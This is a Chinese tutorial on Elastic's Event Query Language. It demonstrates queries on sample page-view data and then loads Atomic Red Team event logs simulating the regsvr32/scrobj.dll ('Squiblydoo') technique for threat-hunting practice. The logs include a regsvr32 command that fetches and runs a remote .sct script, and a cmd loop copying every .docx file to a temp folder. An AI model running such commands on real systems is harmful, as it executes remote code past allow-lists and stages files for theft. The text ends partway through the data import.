EQL 的全名是 Event Query Language (EQL)。事件查询语言(EQL)是一种用于基于事件的时间序列数据(例如日志,指标和跟踪)的查询语言。 在 Elastic Security 平台上,当输入有效的 EQL 时,查询会在数据节点上编译,执行查询并返回结果。这一切都快速、并行地发生,让用户立即看到结果。 **EQL 使你可以表达事件之间的关系:**许多查询语言允许您匹配单个事件。EQL 使你可以匹配不同事件类别和时间跨度的一系列事件。 **EQL 的学习曲线很低:**EQL 语法看起来像其他常见查询语言,例如 SQL。 EQL 使你可以直观地编写和读取查询,从而可以进行快速,迭代的搜索。 **EQL 设计用于安全用例:**尽管你可以将其用于任何基于事件的数据,但我们创建了 EQL 来进行威胁搜寻。 EQL不仅支持危害指标(IOC)搜索,而且可以描述超出 IOC 范围的活动。 要运行 EQL 搜索,搜索到的数据流或索引必须包含时间戳和事件类别字段。 默认情况下,EQL 使用 Elastic 通用模式(ECS)中的 @timestamp 和 event.category 字段。 @timestamp 表示时间戳,event.category 表示事件分类。 咱们准备一些简单的数据,用于表示电商网站页面跳转。 # 创建索引
PUT / gmall
# 批量增加数据
PUT _bulk
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:00:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "" , "page_id" : "login" , "user_id" : "" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:01:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "login" , "page_id" : "good_list" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:05:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "good_list" , "page_id" : "good_detail" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:07:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "good_detail" , "page_id" : "order" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:08:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" , "last_page_id" : "order" , "page_id" : "payment" , "user_id" : "1" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:08:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125102" , "last_page_id" : "" , "page_id" : "login" , "user_id" : "2" } }
{ "index" : { "_index" : "gmall" } }
{ "@timestamp" : "2022-06-01T12:08:00.00+08:00" , "event" : { "category" : "page" } , "page" : { "session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125102" , "last_page_id" : "login" , "page_id" : "payment" , "user_id" : "2" } }
# 返回
{
"errors" : false ,
"took" : 195901276 ,
"items" : [
{
"index" : {
"_index" : "gmall" ,
"_id" : "nEyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 0 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "nUyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 1 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "nkyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 2 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "n0yFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 3 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "oEyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 4 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "oUyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 5 ,
"_primary_term" : 1 ,
"status" : 201
}
} ,
{
"index" : {
"_index" : "gmall" ,
"_id" : "okyFbpQBHxOD1OVrB0ua" ,
"_version" : 1 ,
"result" : "created" ,
"_shards" : {
"total" : 2 ,
"successful" : 1 ,
"failed" : 0
} ,
"_seq_no" : 6 ,
"_primary_term" : 1 ,
"status" : 201
}
}
]
}
在事件响应过程中,有很多时候,了解特定时间发生的所有事件是很有用的。 使用一种名为any 的特殊事件类型,针对所有事件进行匹配,如果想要匹配特定事件,就需要指明事件分类名称 # 请求
GET / gmall/ _eql/ search
{
"query" : "" "
any where page. user_id == "1"
"" "
}
# 返回
{
"is_partial" : false ,
"is_running" : false ,
"took" : 0 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 4 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "gmall" ,
"_id" : "nUyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:01:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "login" ,
"page_id" : "good_list" ,
"user_id" : "1"
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "nkyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:05:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "good_list" ,
"page_id" : "good_detail" ,
"user_id" : "1"
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "n0yFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:07:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "good_detail" ,
"page_id" : "order" ,
"user_id" : "1"
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "oEyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:08:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "order" ,
"page_id" : "payment" ,
"user_id" : "1"
}
}
}
]
}
}
# 请求
GET / gmall/ _eql/ search
{
"query" : "" "
any where true
"" ",
"filter" : {
"range" : {
"@timestamp" : {
"gte" : "1654056000000" ,
"lt" : "1654056005000"
}
}
}
}
# 返回
{
"is_partial" : false ,
"is_running" : false ,
"took" : 0 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "gmall" ,
"_id" : "nEyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:00:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "" ,
"page_id" : "login" ,
"user_id" : ""
}
}
}
]
}
}
页面先访问 login,后面又访问了 good_detail 的页面,sequence 表示按照page.session_id 分组。 # 请求
GET / gmall/ _eql/ search
{
"query" : "" "
sequence by page. session_id
[ page where page. page_id== "login" ]
[ page where page. page_id== "good_detail" ]
"" "
}
# 返回
{
"is_partial" : false ,
"is_running" : false ,
"took" : 16 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"sequences" : [
{
"join_keys" : [
"42FC7E13-CB3E-5C05-0000-0010A0125101"
] ,
"events" : [
{
"_index" : "gmall" ,
"_id" : "nEyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:00:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "" ,
"page_id" : "login" ,
"user_id" : ""
}
}
} ,
{
"_index" : "gmall" ,
"_id" : "nkyFbpQBHxOD1OVrB0ua" ,
"_source" : {
"@timestamp" : "2022-06-01T12:05:00.00+08:00" ,
"event" : {
"category" : "page"
} ,
"page" : {
"session_id" : "42FC7E13-CB3E-5C05-0000-0010A0125101" ,
"last_page_id" : "good_list" ,
"page_id" : "good_detail" ,
"user_id" : "1"
}
}
}
]
}
]
}
}
regsvr32.exe 是一个内置的命令行实用程序,用于在 Windows 中注册.dll 库。作为本机工具,regsvr32.exe 具有受信任的状态,从而使它可以绕过大多数允许列表软件和脚本阻止程序。 有权访问用户命令行的攻击者可以使用 regsvr32.exe 通过.dll 库运行恶意脚本,即使在其他情况下也不允许这些脚本运行。 regsvr32 滥用的一种常见变体是 Squfullydoo 攻击。在 Squfullydoo 攻击中,regsvr32.exe 命令使用 scrobj.dll 库注册并运行远程脚本。 测试数据来自 Atomic Red Team 的测试数据集,其中包括模仿 Squibledoo 攻击的事件。 # 创建索引
PUT my- eql- index
# 导入数据
POST my- eql- index/ _bulk? pretty& refresh
{ "index" : { } }
{ "process" : { "parent" : { "name" : "powershell.exe" , "entity_id" : "{42FC7E13-C11D-5C05-0000-0010C6E90401}" , "executable" : "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" } , "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "command_line" : "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /R c: %%f in (*.docx) do copy %%f c:\\temp\\\"" , "executable" : "C:\\Windows\\System32\\cmd.exe" , "ppid" : 7036 } , "logon_id" : 217055 , "@timestamp" : 131883571822010000 , "event" : { "category" : "process" , "type" : "creation" } , "user" : { "full_name" : "bob" , "domain" : "ART-DESKTOP" , "id" : "ART-DESKTOP\\bob" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cmd.exe" , "name" : "cmd.exe" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ntdll.dll" , "name" : "ntdll.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\kernel32.dll" , "name" : "kernel32.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\KernelBase.dll" , "name" : "KernelBase.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msvcrt.dll" , "name" : "msvcrt.dll" } , "@timestamp" : 131883571821990000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "cmd.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CB3E-5C05-0000-0010A0125101}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "@timestamp" : 131883571822140000 , "event" : { "category" : "process" , "type" : "terminate" } }
{ "index" : { } }
{ "process" : { "parent" : { "name" : "cmd.exe" , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010AA385401}" , "executable" : "C:\\Windows\\System32\\cmd.exe" } , "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "command_line" : "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" , "ppid" : 2652 } , "logon_id" : 217055 , "@timestamp" : 131883573237130000 , "event" : { "category" : "process" , "type" : "creation" } , "user" : { "full_name" : "bob" , "domain" : "ART-DESKTOP" , "id" : "ART-DESKTOP\\bob" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\regsvr32.exe" , "name" : "regsvr32.exe" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ntdll.dll" , "name" : "ntdll.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\kernel32.dll" , "name" : "kernel32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\KernelBase.dll" , "name" : "KernelBase.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\apphelp.dll" , "name" : "apphelp.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\AcLayers.dll" , "name" : "AcLayers.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msvcrt.dll" , "name" : "msvcrt.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\user32.dll" , "name" : "user32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\win32u.dll" , "name" : "win32u.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\gdi32.dll" , "name" : "gdi32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\gdi32full.dll" , "name" : "gdi32full.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\msvcp_win.dll" , "name" : "msvcp_win.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ucrtbase.dll" , "name" : "ucrtbase.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\shlwapi.dll" , "name" : "shlwapi.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\combase.dll" , "name" : "combase.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\rpcrt4.dll" , "name" : "rpcrt4.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\bcryptprimitives.dll" , "name" : "bcryptprimitives.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sfc.dll" , "name" : "sfc.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\winspool.drv" , "name" : "winspool.drv" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\kernel.appcore.dll" , "name" : "kernel.appcore.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\propsys.dll" , "name" : "propsys.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\oleaut32.dll" , "name" : "oleaut32.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\SHCore.dll" , "name" : "SHCore.dll" } , "@timestamp" : 131883573237140000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sechost.dll" , "name" : "sechost.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\IPHLPAPI.DLL" , "name" : "IPHLPAPI.DLL" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\bcrypt.dll" , "name" : "bcrypt.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sfc.dll" , "name" : "sfc.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sfc_os.dll" , "name" : "sfc_os.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\imm32.dll" , "name" : "imm32.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ole32.dll" , "name" : "ole32.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\uxtheme.dll" , "name" : "uxtheme.dll" } , "@timestamp" : 131883573237300000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\scrobj.dll" , "name" : "scrobj.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\advapi32.dll" , "name" : "advapi32.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\urlmon.dll" , "name" : "urlmon.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\windows.storage.dll" , "name" : "windows.storage.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\profapi.dll" , "name" : "profapi.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\powrprof.dll" , "name" : "powrprof.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\iertutil.dll" , "name" : "iertutil.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\fltLib.dll" , "name" : "fltLib.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cryptbase.dll" , "name" : "cryptbase.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\dwmapi.dll" , "name" : "dwmapi.dll" } , "@timestamp" : 131883573237450016 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sspicli.dll" , "name" : "sspicli.dll" } , "@timestamp" : 131883573237930000 , "event" : { "category" : "library" } }
{ "index" : { } }
